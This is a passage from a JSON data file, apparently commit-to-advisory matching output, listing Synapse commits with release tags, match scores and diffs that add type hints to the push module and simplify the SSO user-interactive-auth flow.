"v1.64.0rc2", - "v1.65.0", - "v1.65.0.post1.dev1", - "v1.65.0rc1", - "v1.65.0rc2", - "v1.66.0", - "v1.66.0rc1", - "v1.66.0rc2", - "v1.67.0", - "v1.67.0rc1", - "v1.68.0", - "v1.68.0rc1", - "v1.68.0rc2", - "v1.69.0", - "v1.69.0rc1", - "v1.69.0rc2", - "v1.69.0rc3", - "v1.69.0rc4", - "v1.70.0", - "v1.70.0rc1", - "v1.70.0rc2", - "v1.70.1", - "v1.71.0", - "v1.71.0rc1", - "v1.71.0rc2", - "v1.72.0", - "v1.72.0rc1", - "v1.73.0", - "v1.73.0rc1", - "v1.73.0rc2", - "v1.74.0", - "v1.74.0rc1", - "v1.75.0", - "v1.75.0rc1", - "v1.75.0rc2", - "v1.76.0", - "v1.76.0rc1", - "v1.76.0rc2", - "v1.77.0", - "v1.77.0rc1", - "v1.77.0rc2", - "v1.78.0", - "v1.78.0rc1", - "v1.79.0", - "v1.79.0rc1", - "v1.79.0rc2", - "v1.80.0", - "v1.80.0rc1", - "v1.80.0rc2", - "v1.81.0", - "v1.81.0rc1", - "v1.81.0rc2", - "v1.82.0", - "v1.82.0rc1", - "v1.83.0", - "v1.83.0rc1", - "v1.84.0", - "v1.84.0rc1", - "v1.84.1", - "v1.85.0", - "v1.85.0rc1", - "v1.85.0rc2", - "v1.85.1", - "v1.85.2", - "v1.86.0", - "v1.86.0rc1", - "v1.86.0rc2", - "v1.87.0", - "v1.87.0rc1", - "v1.88.0", - "v1.88.0rc1", - "v1.89.0", - "v1.89.0rc1", - "v1.90.0", - "v1.90.0rc1", - "v1.91.0", - "v1.91.0rc1", - "v1.91.1", - "v1.91.2", - "v1.92.0", - "v1.92.0rc1", - "v1.92.1", - "v1.92.2", - "v1.92.3", - "v1.93.0", - "v1.93.0rc1", - "v1.94.0", - "v1.94.0rc1", - "v1.95.0", - "v1.95.0rc1", - "v1.95.1", - "v1.96.0", - "v1.96.0rc1", - "v1.96.1", - "v1.97.0", - "v1.97.0rc1", - "v1.98.0", - "v1.98.0rc1" - ], - "matched_rules": [ - { - "id": "XREF_GH", - "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8905, 8905", - "relevance": 32 - }, - { - "id": "GITHUB_ISSUE_IN_MESSAGE", - "message": "The commit message references some github issue: 8905", - "relevance": 2 - } - ] - }, - { - "commit_id": "5d34f40d494305bb32b3d57c18fb17d98d21a31f", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1607705033, - "hunks": 75, - "message": "Add type hints to the push module. (#8901)", - "diff": [ - "diff --git a/changelog.d/8901.misc b/changelog.d/8901.misc", - "new file mode 100644", - "index 000000000..4ff0b94b9", - "--- /dev/null", - "+++ b/changelog.d/8901.misc", - "@@ -0,0 +1 @@", - "+Add type hints to push module.", - "diff --git a/mypy.ini b/mypy.ini", - "index 12408b8d9..334e3a22f 100644", - "--- a/mypy.ini", - "+++ b/mypy.ini", - "@@ -58,8 +58,3 @@ files =", - " synapse/notifier.py,", - "- synapse/push/emailpusher.py,", - "- synapse/push/httppusher.py,", - "- synapse/push/mailer.py,", - "- synapse/push/pusher.py,", - "- synapse/push/pusherpool.py,", - "- synapse/push/push_rule_evaluator.py,", - "+ synapse/push,", - " synapse/replication,", - "diff --git a/scripts-dev/mypy_synapse_plugin.py b/scripts-dev/mypy_synapse_plugin.py", - "index 5882f3a0b..f7f18805e 100644", - "--- a/scripts-dev/mypy_synapse_plugin.py", - "+++ b/scripts-dev/mypy_synapse_plugin.py", - "@@ -33,2 +33,4 @@ class SynapsePlugin(Plugin):", - " \"synapse.util.caches.descriptors._CachedFunction.__call__\"", - "+ ) or fullname.startswith(", - "+ \"synapse.util.caches.descriptors._LruCachedFunction.__call__\"", - " ):", - "diff --git a/synapse/push/action_generator.py b/synapse/push/action_generator.py", - "index fabc9ba12..aaed28650 100644", - "--- a/synapse/push/action_generator.py", - "+++ b/synapse/push/action_generator.py", - "@@ -16,6 +16,11 @@", - " import logging", - "+from typing import TYPE_CHECKING", - "+from synapse.events import EventBase", - "+from synapse.events.snapshot import EventContext", - "+from synapse.push.bulk_push_rule_evaluator import BulkPushRuleEvaluator", - " from synapse.util.metrics import Measure", - "-from .bulk_push_rule_evaluator import BulkPushRuleEvaluator", - "+if TYPE_CHECKING:", - "+ from synapse.app.homeserver import HomeServer", - "@@ -25,6 +30,4 @@ logger = logging.getLogger(__name__)", - " class ActionGenerator:", - "- def __init__(self, hs):", - "- self.hs = hs", - "+ def __init__(self, hs: \"HomeServer\"):", - " self.clock = hs.get_clock()", - "- self.store = hs.get_datastore()", - " self.bulk_evaluator = BulkPushRuleEvaluator(hs)", - "@@ -37,3 +40,5 @@ class ActionGenerator:", - "- async def handle_push_actions_for_event(self, event, context):", - "+ async def handle_push_actions_for_event(", - "+ self, event: EventBase, context: EventContext", - "+ ) -> None:", - " with Measure(self.clock, \"action_for_event_by_user\"):", - "diff --git a/synapse/push/baserules.py b/synapse/push/baserules.py", - "index f5788c1de..621150699 100644", - "--- a/synapse/push/baserules.py", - "+++ b/synapse/push/baserules.py", - "@@ -17,2 +17,3 @@", - " import copy", - "+from typing import Any, Dict, List", - "@@ -21,3 +22,5 @@ from synapse.push.rulekinds import PRIORITY_CLASS_INVERSE_MAP, PRIORITY_CLASS_MA", - "-def list_with_base_rules(rawrules, use_new_defaults=False):", - "+def list_with_base_rules(", - "+ rawrules: List[Dict[str, Any]], use_new_defaults: bool = False", - "+) -> List[Dict[str, Any]]:", - " \"\"\"Combine the list of rules set by the user with the default push rules", - "@@ -25,4 +28,4 @@ def list_with_base_rules(rawrules, use_new_defaults=False):", - " Args:", - "- rawrules(list): The rules the user has modified or set.", - "- use_new_defaults(bool): Whether to use the new experimental default rules when", - "+ rawrules: The rules the user has modified or set.", - "+ use_new_defaults: Whether to use the new experimental default rules when", - " appending or prepending default rules.", - "@@ -96,3 +99,7 @@ def list_with_base_rules(rawrules, use_new_defaults=False):", - "-def make_base_append_rules(kind, modified_base_rules, use_new_defaults=False):", - "+def make_base_append_rules(", - "+ kind: str,", - "+ modified_base_rules: Dict[str, Dict[str, Any]],", - "+ use_new_defaults: bool = False,", - "+) -> List[Dict[str, Any]]:", - " rules = []", - "@@ -118,2 +125,3 @@ def make_base_append_rules(kind, modified_base_rules, use_new_defaults=False):", - " # Only modify the actions, keep the conditions the same.", - "+ assert isinstance(r[\"rule_id\"], str)", - " modified = modified_base_rules.get(r[\"rule_id\"])", - "@@ -125,3 +133,7 @@ def make_base_append_rules(kind, modified_base_rules, use_new_defaults=False):", - "-def make_base_prepend_rules(kind, modified_base_rules, use_new_defaults=False):", - "+def make_base_prepend_rules(", - "+ kind: str,", - "+ modified_base_rules: Dict[str, Dict[str, Any]],", - "+ use_new_defaults: bool = False,", - "+) -> List[Dict[str, Any]]:", - " rules = []", - "@@ -135,2 +147,3 @@ def make_base_prepend_rules(kind, modified_base_rules, use_new_defaults=False):", - " # Only modify the actions, keep the conditions the same.", - "+ assert isinstance(r[\"rule_id\"], str)", - " modified = modified_base_rules.get(r[\"rule_id\"])", - "diff --git a/synapse/push/bulk_push_rule_evaluator.py b/synapse/push/bulk_push_rule_evaluator.py", - "index 82a72dc34..10f27e437 100644", - "--- a/synapse/push/bulk_push_rule_evaluator.py", - "+++ b/synapse/push/bulk_push_rule_evaluator.py", - "@@ -17,2 +17,3 @@", - " import logging", - "+from typing import TYPE_CHECKING, Any, Dict, List, Optional, Set, Tuple, Union", - "@@ -27,3 +28,3 @@ from synapse.state import POWER_KEY", - " from synapse.util.async_helpers import Linearizer", - "-from synapse.util.caches import register_cache", - "+from synapse.util.caches import CacheMetric, register_cache", - " from synapse.util.caches.descriptors import lru_cache", - "@@ -33,6 +34,6 @@ from .push_rule_evaluator import PushRuleEvaluatorForEvent", - "-logger = logging.getLogger(__name__)", - "-", - "+if TYPE_CHECKING:", - "+ from synapse.app.homeserver import HomeServer", - "-rules_by_room = {}", - "+logger = logging.getLogger(__name__)", - "@@ -103,3 +104,3 @@ class BulkPushRuleEvaluator:", - "- def __init__(self, hs):", - "+ def __init__(self, hs: \"HomeServer\"):", - " self.hs = hs", - "@@ -115,3 +116,5 @@ class BulkPushRuleEvaluator:", - "- async def _get_rules_for_event(self, event, context):", - "+ async def _get_rules_for_event(", - "+ self, event: EventBase, context: EventContext", - "+ ) -> Dict[str, List[Dict[str, Any]]]:", - " \"\"\"This gets the rules for all users in the room at the time of the event,", - "@@ -142,7 +145,4 @@ class BulkPushRuleEvaluator:", - " @lru_cache()", - "- def _get_rules_for_room(self, room_id):", - "+ def _get_rules_for_room(self, room_id: str) -> \"RulesForRoom\":", - " \"\"\"Get the current RulesForRoom object for the given room id", - "-", - "- Returns:", - "- RulesForRoom", - " \"\"\"", - "@@ -158,3 +158,5 @@ class BulkPushRuleEvaluator:", - "- async def _get_power_levels_and_sender_level(self, event, context):", - "+ async def _get_power_levels_and_sender_level(", - "+ self, event: EventBase, context: EventContext", - "+ ) -> Tuple[dict, int]:", - " prev_state_ids = await context.get_prev_state_ids()", - "@@ -164,4 +166,3 @@ class BulkPushRuleEvaluator:", - " # not having a power level event is an extreme edge case", - "- pl_event = await self.store.get_event(pl_event_id)", - "- auth_events = {POWER_KEY: pl_event}", - "+ auth_events = {POWER_KEY: await self.store.get_event(pl_event_id)}", - " else:", - "@@ -170,4 +171,4 @@ class BulkPushRuleEvaluator:", - " )", - "- auth_events = await self.store.get_events(auth_events_ids)", - "- auth_events = {(e.type, e.state_key): e for e in auth_events.values()}", - "+ auth_events_dict = await self.store.get_events(auth_events_ids)", - "+ auth_events = {(e.type, e.state_key): e for e in auth_events_dict.values()}", - "@@ -179,3 +180,5 @@ class BulkPushRuleEvaluator:", - "- async def action_for_event_by_user(self, event, context) -> None:", - "+ async def action_for_event_by_user(", - "+ self, event: EventBase, context: EventContext", - "+ ) -> None:", - " \"\"\"Given an event and context, evaluate the push rules, check if the message", - "@@ -187,3 +190,3 @@ class BulkPushRuleEvaluator:", - " rules_by_user = await self._get_rules_for_event(event, context)", - "- actions_by_user = {}", - "+ actions_by_user = {} # type: Dict[str, List[Union[dict, str]]]", - "@@ -200,3 +203,3 @@ class BulkPushRuleEvaluator:", - "- condition_cache = {}", - "+ condition_cache = {} # type: Dict[str, bool]", - "@@ -251,3 +254,9 @@ class BulkPushRuleEvaluator:", - "-def _condition_checker(evaluator, conditions, uid, display_name, cache):", - "+def _condition_checker(", - "+ evaluator: PushRuleEvaluatorForEvent,", - "+ conditions: List[dict],", - "+ uid: str,", - "+ display_name: str,", - "+ cache: Dict[str, bool],", - "+) -> bool:", - " for cond in conditions:", - "@@ -279,3 +288,7 @@ class RulesForRoom:", - " def __init__(", - "- self, hs, room_id, rules_for_room_cache: LruCache, room_push_rule_cache_metrics", - "+ self,", - "+ hs: \"HomeServer\",", - "+ room_id: str,", - "+ rules_for_room_cache: LruCache,", - "+ room_push_rule_cache_metrics: CacheMetric,", - " ):", - "@@ -283,7 +296,7 @@ class RulesForRoom:", - " Args:", - "- hs (HomeServer)", - "- room_id (str)", - "+ hs: The HomeServer object.", - "+ room_id: The room ID.", - " rules_for_room_cache: The cache object that caches these", - " RoomsForUser objects.", - "- room_push_rule_cache_metrics (CacheMetric)", - "+ room_push_rule_cache_metrics: The metrics object", - " \"\"\"", - "@@ -296,4 +309,6 @@ class RulesForRoom:", - "- self.member_map = {} # event_id -> (user_id, state)", - "- self.rules_by_user = {} # user_id -> rules", - "+ # event_id -> (user_id, state)", - "+ self.member_map = {} # type: Dict[str, Tuple[str, str]]", - "+ # user_id -> rules", - "+ self.rules_by_user = {} # type: Dict[str, List[Dict[str, dict]]]", - "@@ -317,3 +332,3 @@ class RulesForRoom:", - " # them.", - "- self.uninteresting_user_set = set()", - "+ self.uninteresting_user_set = set() # type: Set[str]", - "@@ -327,3 +342,5 @@ class RulesForRoom:", - "- async def get_rules(self, event, context):", - "+ async def get_rules(", - "+ self, event: EventBase, context: EventContext", - "+ ) -> Dict[str, List[Dict[str, dict]]]:", - " \"\"\"Given an event context return the rules for all users who are", - "@@ -358,2 +375,4 @@ class RulesForRoom:", - " push_rules_delta_state_cache_metric.inc_misses()", - "+ # Ensure the state IDs exist.", - "+ assert current_state_ids is not None", - "@@ -422,4 +441,8 @@ class RulesForRoom:", - " async def _update_rules_with_member_event_ids(", - "- self, ret_rules_by_user, member_event_ids, state_group, event", - "- ):", - "+ self,", - "+ ret_rules_by_user: Dict[str, list],", - "+ member_event_ids: Dict[str, str],", - "+ state_group: Optional[int],", - "+ event: EventBase,", - "+ ) -> None:", - " \"\"\"Update the partially filled rules_by_user dict by fetching rules for", - "@@ -428,5 +451,5 @@ class RulesForRoom:", - " Args:", - "- ret_rules_by_user (dict): Partiallly filled dict of push rules. Gets", - "+ ret_rules_by_user: Partially filled dict of push rules. Gets", - " updated with any new rules.", - "- member_event_ids (dict): Dict of user id to event id for membership events", - "+ member_event_ids: Dict of user id to event id for membership events", - " that have happened since the last time we filled rules_by_user", - "@@ -434,2 +457,3 @@ class RulesForRoom:", - " for. Used when updating the cache.", - "+ event: The event we are currently computing push rules for.", - " \"\"\"", - "@@ -451,3 +475,3 @@ class RulesForRoom:", - "- user_ids = {", - "+ joined_user_ids = {", - " user_id", - "@@ -457,3 +481,3 @@ class RulesForRoom:", - "- logger.debug(\"Joined: %r\", user_ids)", - "+ logger.debug(\"Joined: %r\", joined_user_ids)", - "@@ -463,3 +487,3 @@ class RulesForRoom:", - " # the room. Therefore we just need to filter for local users here.", - "- user_ids = list(filter(self.is_mine_id, user_ids))", - "+ user_ids = list(filter(self.is_mine_id, joined_user_ids))", - "@@ -475,3 +499,3 @@ class RulesForRoom:", - "- def invalidate_all(self):", - "+ def invalidate_all(self) -> None:", - " # Note: Don't hand this function directly to an invalidation callback", - "@@ -487,3 +511,3 @@ class RulesForRoom:", - "- def update_cache(self, sequence, members, rules_by_user, state_group):", - "+ def update_cache(self, sequence, members, rules_by_user, state_group) -> None:", - " if sequence == self.sequence:", - "@@ -508,3 +532,3 @@ class _Invalidation:", - "- def __call__(self):", - "+ def __call__(self) -> None:", - " rules = self.cache.get(self.room_id, None, update_metrics=False)", - "diff --git a/synapse/push/clientformat.py b/synapse/push/clientformat.py", - "index a59b639f1..0cadba761 100644", - "--- a/synapse/push/clientformat.py", - "+++ b/synapse/push/clientformat.py", - "@@ -16,7 +16,9 @@", - " import copy", - "+from typing import Any, Dict, List, Optional", - " from synapse.push.rulekinds import PRIORITY_CLASS_INVERSE_MAP, PRIORITY_CLASS_MAP", - "+from synapse.types import UserID", - "-def format_push_rules_for_user(user, ruleslist):", - "+def format_push_rules_for_user(user: UserID, ruleslist) -> Dict[str, Dict[str, list]]:", - " \"\"\"Converts a list of rawrules and a enabled map into nested dictionaries", - "@@ -27,3 +29,6 @@ def format_push_rules_for_user(user, ruleslist):", - "- rules = {\"global\": {}, \"device\": {}}", - "+ rules = {", - "+ \"global\": {},", - "+ \"device\": {},", - "+ } # type: Dict[str, Dict[str, List[Dict[str, Any]]]]", - "@@ -32,4 +37,2 @@ def format_push_rules_for_user(user, ruleslist):", - " for r in ruleslist:", - "- rulearray = None", - "-", - " template_name = _priority_class_to_template_name(r[\"priority_class\"])", - "@@ -59,3 +62,3 @@ def format_push_rules_for_user(user, ruleslist):", - "-def _add_empty_priority_class_arrays(d):", - "+def _add_empty_priority_class_arrays(d: Dict[str, list]) -> Dict[str, list]:", - " for pc in PRIORITY_CLASS_MAP.keys():", - "@@ -65,3 +68,3 @@ def _add_empty_priority_class_arrays(d):", - "-def _rule_to_template(rule):", - "+def _rule_to_template(rule: Dict[str, Any]) -> Optional[Dict[str, Any]]:", - " unscoped_rule_id = None", - "@@ -84,2 +87,6 @@ def _rule_to_template(rule):", - " templaterule[\"pattern\"] = thecond[\"pattern\"]", - "+ else:", - "+ # This should not be reached unless this function is not kept in sync", - "+ # with PRIORITY_CLASS_INVERSE_MAP.", - "+ raise ValueError(\"Unexpected template_name: %s\" % (template_name,))", - "@@ -92,3 +99,3 @@ def _rule_to_template(rule):", - "-def _rule_id_from_namespaced(in_rule_id):", - "+def _rule_id_from_namespaced(in_rule_id: str) -> str:", - " return in_rule_id.split(\"/\")[-1]", - "@@ -96,3 +103,3 @@ def _rule_id_from_namespaced(in_rule_id):", - "-def _priority_class_to_template_name(pc):", - "+def _priority_class_to_template_name(pc: int) -> str:", - " return PRIORITY_CLASS_INVERSE_MAP[pc]", - "diff --git a/synapse/push/presentable_names.py b/synapse/push/presentable_names.py", - "index d8f4a453c..7e50341d7 100644", - "--- a/synapse/push/presentable_names.py", - "+++ b/synapse/push/presentable_names.py", - "@@ -17,4 +17,10 @@ import logging", - " import re", - "+from typing import TYPE_CHECKING, Dict, Iterable, Optional", - " from synapse.api.constants import EventTypes", - "+from synapse.events import EventBase", - "+from synapse.types import StateMap", - "+", - "+if TYPE_CHECKING:", - "+ from synapse.storage.databases.main import DataStore", - "@@ -30,8 +36,8 @@ ALL_ALONE = \"Empty Room\"", - " async def calculate_room_name(", - "- store,", - "- room_state_ids,", - "- user_id,", - "- fallback_to_members=True,", - "- fallback_to_single_member=True,", - "-):", - "+ store: \"DataStore\",", - "+ room_state_ids: StateMap[str],", - "+ user_id: str,", - "+ fallback_to_members: bool = True,", - "+ fallback_to_single_member: bool = True,", - "+) -> Optional[str]:", - " \"\"\"", - "@@ -41,3 +47,4 @@ async def calculate_room_name(", - " Args:", - "- room_state: Dictionary of the room's state", - "+ store: The data store to query.", - "+ room_state_ids: Dictionary of the room's state IDs.", - " user_id: The ID of the user to whom the room name is being presented", - "@@ -46,5 +53,8 @@ async def calculate_room_name(", - " title or aliases.", - "+ fallback_to_single_member: If False, return None instead of generating a", - "+ name based on the user who invited this user to the room if the room", - "+ has no title or aliases.", - " Returns:", - "- (string or None) A human readable name for the room.", - "+ A human readable name for the room, if possible.", - " \"\"\"", - "@@ -99,3 +109,3 @@ async def calculate_room_name(", - " else:", - "- return", - "+ return None", - " else:", - "@@ -152,8 +162,8 @@ async def calculate_room_name(", - " elif len(other_members) == 1 and not fallback_to_single_member:", - "- return", - "- else:", - "- return descriptor_from_member_events(other_members)", - "+ return None", - "+", - "+ return descriptor_from_member_events(other_members)", - "-def descriptor_from_member_events(member_events):", - "+def descriptor_from_member_events(member_events: Iterable[EventBase]) -> str:", - " \"\"\"Get a description of the room based on the member events.", - "@@ -161,6 +171,6 @@ def descriptor_from_member_events(member_events):", - " Args:", - "- member_events (Iterable[FrozenEvent])", - "+ member_events: The events of a room.", - " Returns:", - "- str", - "+ The room description", - " \"\"\"", - "@@ -185,3 +195,3 @@ def descriptor_from_member_events(member_events):", - "-def name_from_member_event(member_event):", - "+def name_from_member_event(member_event: EventBase) -> str:", - " if (", - "@@ -195,4 +205,4 @@ def name_from_member_event(member_event):", - "-def _state_as_two_level_dict(state):", - "- ret = {}", - "+def _state_as_two_level_dict(state: StateMap[str]) -> Dict[str, Dict[str, str]]:", - "+ ret = {} # type: Dict[str, Dict[str, str]]", - " for k, v in state.items():", - "@@ -202,3 +212,3 @@ def _state_as_two_level_dict(state):", - "-def _looks_like_an_alias(string):", - "+def _looks_like_an_alias(string: str) -> bool:", - " return ALIAS_RE.match(string) is not None", - "diff --git a/synapse/push/push_rule_evaluator.py b/synapse/push/push_rule_evaluator.py", - "index 2ce9e444a..ba1877adc 100644", - "--- a/synapse/push/push_rule_evaluator.py", - "+++ b/synapse/push/push_rule_evaluator.py", - "@@ -32,3 +32,5 @@ INEQUALITY_EXPR = re.compile(\"^([=<>]*)([0-9]*)$\")", - "-def _room_member_count(ev, condition, room_member_count):", - "+def _room_member_count(", - "+ ev: EventBase, condition: Dict[str, Any], room_member_count: int", - "+) -> bool:", - " return _test_ineq_condition(condition, room_member_count)", - "@@ -36,3 +38,8 @@ def _room_member_count(ev, condition, room_member_count):", - "-def _sender_notification_permission(ev, condition, sender_power_level, power_levels):", - "+def _sender_notification_permission(", - "+ ev: EventBase,", - "+ condition: Dict[str, Any],", - "+ sender_power_level: int,", - "+ power_levels: Dict[str, Union[int, Dict[str, int]]],", - "+) -> bool:", - " notif_level_key = condition.get(\"key\")", - "@@ -42,2 +49,3 @@ def _sender_notification_permission(ev, condition, sender_power_level, power_lev", - " notif_levels = power_levels.get(\"notifications\", {})", - "+ assert isinstance(notif_levels, dict)", - " room_notif_level = notif_levels.get(notif_level_key, 50)", - "@@ -47,3 +55,3 @@ def _sender_notification_permission(ev, condition, sender_power_level, power_lev", - "-def _test_ineq_condition(condition, number):", - "+def _test_ineq_condition(condition: Dict[str, Any], number: int) -> bool:", - " if \"is\" not in condition:", - "@@ -112,3 +120,3 @@ class PushRuleEvaluatorForEvent:", - " sender_power_level: int,", - "- power_levels: dict,", - "+ power_levels: Dict[str, Union[int, Dict[str, int]]],", - " ):", - "@@ -122,3 +130,5 @@ class PushRuleEvaluatorForEvent:", - "- def matches(self, condition: dict, user_id: str, display_name: str) -> bool:", - "+ def matches(", - "+ self, condition: Dict[str, Any], user_id: str, display_name: str", - "+ ) -> bool:", - " if condition[\"kind\"] == \"event_match\":", - "@@ -263,3 +273,9 @@ def _re_word_boundary(r: str) -> str:", - "-def _flatten_dict(d, prefix=[], result=None):", - "+def _flatten_dict(", - "+ d: Union[EventBase, dict],", - "+ prefix: Optional[List[str]] = None,", - "+ result: Optional[Dict[str, str]] = None,", - "+) -> Dict[str, str]:", - "+ if prefix is None:", - "+ prefix = []", - " if result is None:" - ], - "changed_files": [ - "changelog.d/8901.misc", - "mypy.ini", - "scripts-dev/mypy_synapse_plugin.py", - "synapse/push/action_generator.py", - "synapse/push/baserules.py", - "synapse/push/bulk_push_rule_evaluator.py", - "synapse/push/clientformat.py", - "synapse/push/presentable_names.py", - "synapse/push/push_rule_evaluator.py" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": { - "8901": "Convert internal pusher dicts to attrs #8940" - }, - "cve_refs": [], - "twins": [], - "tags": [ - "v1.25.0", - "v1.25.0rc1", - "v1.26.0", - "v1.26.0-deb", - "v1.26.0rc1", - "v1.26.0rc2", - "v1.27.0", - "v1.27.0rc1", - "v1.27.0rc2", - "v1.28.0", - "v1.28.0rc1", - "v1.29.0", - "v1.29.0rc1", - "v1.30.0", - "v1.30.0rc1", - "v1.30.1", - "v1.31.0", - "v1.31.0rc1", - "v1.32.0", - "v1.32.0rc1", - "v1.32.1", - "v1.32.2", - "v1.33.0", - "v1.33.0rc1", - "v1.33.0rc2", - "v1.33.1", - "v1.33.2", - "v1.34.0", - "v1.34.0rc1", - "v1.35.0", - "v1.35.0rc1", - "v1.35.0rc2", - "v1.35.0rc3", - "v1.35.1", - "v1.36.0", - "v1.36.0rc1", - "v1.36.0rc2", - "v1.37.0", - "v1.37.0rc1", - "v1.37.1", - "v1.37.1a1", - "v1.37.1rc1", - "v1.38.0", - "v1.38.0rc1", - "v1.38.0rc2", - "v1.38.0rc3", - "v1.38.1", - "v1.39.0", - "v1.39.0rc1", - "v1.39.0rc2", - "v1.39.0rc3", - "v1.40.0", - "v1.40.0rc1", - "v1.40.0rc2", - "v1.40.0rc3", - "v1.41.0", - "v1.41.0rc1", - "v1.41.1", - "v1.42.0", - "v1.42.0rc1", - "v1.42.0rc2", - "v1.43.0", - "v1.43.0rc1", - "v1.43.0rc2", - "v1.44.0", - "v1.44.0rc1", - "v1.44.0rc2", - "v1.44.0rc3", - "v1.45.0", - "v1.45.0rc1", - "v1.45.0rc2", - "v1.45.1", - "v1.46-modular1", - "v1.46.0", - "v1.46.0rc1", - "v1.47.0", - "v1.47.0rc1", - "v1.47.0rc2", - "v1.47.0rc3", - "v1.47.1", - "v1.48.0", - "v1.48.0rc1", - "v1.49.0", - "v1.49.0rc1", - "v1.49.1", - "v1.49.2", - "v1.50.0", - "v1.50.0rc1", - "v1.50.0rc2", - "v1.50.1", - "v1.50.2", - "v1.51.0", - "v1.51.0rc1", - "v1.51.0rc2", - "v1.52.0", - "v1.52.0rc1", - "v1.53.0", - "v1.53.0rc1", - "v1.54.0", - "v1.54.0rc1", - "v1.55.0", - "v1.55.0rc1", - "v1.55.1", - "v1.55.2", - "v1.56.0", - "v1.56.0rc1", - "v1.57.0", - "v1.57.0rc1", - "v1.57.1", - "v1.58.0", - "v1.58.0rc1", - "v1.58.0rc2", - "v1.58.1", - "v1.59.0", - "v1.59.0rc1", - "v1.59.0rc2", - "v1.59.1", - "v1.60.0", - "v1.60.0rc1", - "v1.60.0rc2", - "v1.61.0", - "v1.61.0rc1", - "v1.61.1", - "v1.62.0", - "v1.62.0rc1", - "v1.62.0rc2", - "v1.62.0rc3", - "v1.63.0", - "v1.63.0rc1", - "v1.63.1", - "v1.64.0", - "v1.64.0rc1", - "v1.64.0rc2", - "v1.65.0", - "v1.65.0.post1.dev1", - "v1.65.0rc1", - "v1.65.0rc2", - "v1.66.0", - "v1.66.0rc1", - "v1.66.0rc2", - "v1.67.0", - "v1.67.0rc1", - "v1.68.0", - "v1.68.0rc1", - "v1.68.0rc2", - "v1.69.0", - "v1.69.0rc1", - "v1.69.0rc2", - "v1.69.0rc3", - "v1.69.0rc4", - "v1.70.0", - "v1.70.0rc1", - "v1.70.0rc2", - "v1.70.1", - "v1.71.0", - "v1.71.0rc1", - "v1.71.0rc2", - "v1.72.0", - "v1.72.0rc1", - "v1.73.0", - "v1.73.0rc1", - "v1.73.0rc2", - "v1.74.0", - "v1.74.0rc1", - "v1.75.0", - "v1.75.0rc1", - "v1.75.0rc2", - "v1.76.0", - "v1.76.0rc1", - "v1.76.0rc2", - "v1.77.0", - "v1.77.0rc1", - "v1.77.0rc2", - "v1.78.0", - "v1.78.0rc1", - "v1.79.0", - "v1.79.0rc1", - "v1.79.0rc2", - "v1.80.0", - "v1.80.0rc1", - "v1.80.0rc2", - "v1.81.0", - "v1.81.0rc1", - "v1.81.0rc2", - "v1.82.0", - "v1.82.0rc1", - "v1.83.0", - "v1.83.0rc1", - "v1.84.0", - "v1.84.0rc1", - "v1.84.1", - "v1.85.0", - "v1.85.0rc1", - "v1.85.0rc2", - "v1.85.1", - "v1.85.2", - "v1.86.0", - "v1.86.0rc1", - "v1.86.0rc2", - "v1.87.0", - "v1.87.0rc1", - "v1.88.0", - "v1.88.0rc1", - "v1.89.0", - "v1.89.0rc1", - "v1.90.0", - "v1.90.0rc1", - "v1.91.0", - "v1.91.0rc1", - "v1.91.1", - "v1.91.2", - "v1.92.0", - "v1.92.0rc1", - "v1.92.1", - "v1.92.2", - "v1.92.3", - "v1.93.0", - "v1.93.0rc1", - "v1.94.0", - "v1.94.0rc1", - "v1.95.0", - "v1.95.0rc1", - "v1.95.1", - "v1.96.0", - "v1.96.0rc1", - "v1.96.1", - "v1.97.0", - "v1.97.0rc1", - "v1.98.0", - "v1.98.0rc1" - ], - "matched_rules": [ - { - "id": "XREF_GH", - "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8901, 8901", - "relevance": 32 - }, - { - "id": "GITHUB_ISSUE_IN_MESSAGE", - "message": "The commit message references some github issue: 8901", - "relevance": 2 - } - ] - }, - { - "commit_id": "36ba73f53d9919c7639d4c7269fabdb1857fb7a1", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1607436218, - "hunks": 29, - "message": "Simplify the flow for SSO UIA (#8881) * SsoHandler: remove inheritance from BaseHandler * Simplify the flow for SSO UIA We don't need to do all the magic for mapping users when we are doing UIA, so let's factor that out.", - "diff": [ - "diff --git a/changelog.d/8881.misc b/changelog.d/8881.misc", - "new file mode 100644", - "index 000000000..07d3f30fb", - "--- /dev/null", - "+++ b/changelog.d/8881.misc", - "@@ -0,0 +1 @@", - "+Simplify logic for handling user-interactive-auth via single-sign-on servers.", - "diff --git a/mypy.ini b/mypy.ini", - "index 59144be46..12408b8d9 100644", - "--- a/mypy.ini", - "+++ b/mypy.ini", - "@@ -45,2 +45,3 @@ files =", - " synapse/handlers/saml_handler.py,", - "+ synapse/handlers/sso.py,", - " synapse/handlers/sync.py,", - "diff --git a/synapse/handlers/_base.py b/synapse/handlers/_base.py", - "index bb81c0e81..d29b066a5 100644", - "--- a/synapse/handlers/_base.py", - "+++ b/synapse/handlers/_base.py", - "@@ -34,2 +34,6 @@ class BaseHandler:", - " Common base class for the event handlers.", - "+", - "+ Deprecated: new code should not use this. Instead, Handler classes should define the", - "+ fields they actually need. The utility methods should either be factored out to", - "+ standalone helper functions, or to different Handler classes.", - " \"\"\"", - "diff --git a/synapse/handlers/auth.py b/synapse/handlers/auth.py", - "index 2e72298e0..afae6d327 100644", - "--- a/synapse/handlers/auth.py", - "+++ b/synapse/handlers/auth.py", - "@@ -38,2 +38,4 @@ import pymacaroons", - "+from twisted.web.http import Request", - "+", - " from synapse.api.constants import LoginType", - "@@ -1333,3 +1335,3 @@ class AuthHandler(BaseHandler):", - " async def complete_sso_ui_auth(", - "- self, registered_user_id: str, session_id: str, request: SynapseRequest,", - "+ self, registered_user_id: str, session_id: str, request: Request,", - " ):", - "@@ -1339,5 +1341,4 @@ class AuthHandler(BaseHandler):", - " registered_user_id: The registered user ID to complete SSO login for.", - "+ session_id: The ID of the user-interactive auth session.", - " request: The request to complete.", - "- client_redirect_url: The URL to which to redirect the user at the end of the", - "- process.", - " \"\"\"", - "@@ -1357,3 +1358,3 @@ class AuthHandler(BaseHandler):", - " registered_user_id: str,", - "- request: SynapseRequest,", - "+ request: Request,", - " client_redirect_url: str,", - "@@ -1385,3 +1386,3 @@ class AuthHandler(BaseHandler):", - " registered_user_id: str,", - "- request: SynapseRequest,", - "+ request: Request,", - " client_redirect_url: str,", - "diff --git a/synapse/handlers/oidc_handler.py b/synapse/handlers/oidc_handler.py", - "index c605f7082..f626117f7 100644", - "--- 